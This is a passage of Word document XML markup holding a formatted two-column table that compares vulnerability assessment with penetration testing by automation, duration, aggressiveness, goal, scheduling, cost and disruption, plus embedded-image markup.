            <wp:extent cx="5943600" cy="3563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63620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D61F5" w:rsidRDefault="003D61F5" w:rsidP="008C75BB">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D61F5" w:rsidRDefault="003D61F5" w:rsidP="00413D22">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0420" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3968"/>
        <w:gridCol w:w="4632"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D61F5" w:rsidRPr="003D61F5" w:rsidTr="00413D22">
        <w:trPr>
          <w:trHeight w:val="499"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E31837"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnerability Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E31837"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Penetration Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F5" w:rsidRPr="003D61F5" w:rsidTr="00413D22">
        <w:trPr>
          <w:trHeight w:val="499"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAE7E8"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Mainly automated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAE7E8"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Both automated and manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F5" w:rsidRPr="003D61F5" w:rsidTr="00413D22">
        <w:trPr>
          <w:trHeight w:val="499"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Usually takes minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Usually takes days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F5" w:rsidRPr="003D61F5" w:rsidTr="00413D22">
        <w:trPr>
          <w:trHeight w:val="499"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAE7E8"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Passive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAE7E8"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Aggressive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F5" w:rsidRPr="003D61F5" w:rsidTr="00413D22">
        <w:trPr>
          <w:trHeight w:val="499"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Goal is to list vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Goal is to exploit vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F5" w:rsidRPr="003D61F5" w:rsidTr="00413D22">
        <w:trPr>
          <w:trHeight w:val="499"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAE7E8"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Ad hoc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAE7E8"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Scheduled/tightly controlled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F5" w:rsidRPr="003D61F5" w:rsidTr="00413D22">
        <w:trPr>
          <w:trHeight w:val="499"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Internally originating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Externally or internally originating</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F5" w:rsidRPr="003D61F5" w:rsidTr="00413D22">
        <w:trPr>
          <w:trHeight w:val="499"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAE7E8"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Cost is generally low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAE7E8"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Cost is generally high</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F5" w:rsidRPr="003D61F5" w:rsidTr="00413D22">
        <w:trPr>
          <w:trHeight w:val="499"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>No/minimal system disruption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E31837"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003D61F5" w:rsidRPr="004244D7" w:rsidRDefault="003D61F5" w:rsidP="003D61F5">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004244D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Potential system / process disruption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003D61F5" w:rsidRPr="00D537AF" w:rsidRDefault="003D61F5" w:rsidP="008C75BB">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002111AF" w:rsidRPr="00D537AF" w:rsidRDefault="002111AF" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB394F" w:rsidRDefault="00BB394F" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB394F" w:rsidRDefault="003E5AB0" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E13A84E" wp14:editId="2D4758AC">
            <wp:extent cx="55245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4500" cy="4114800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
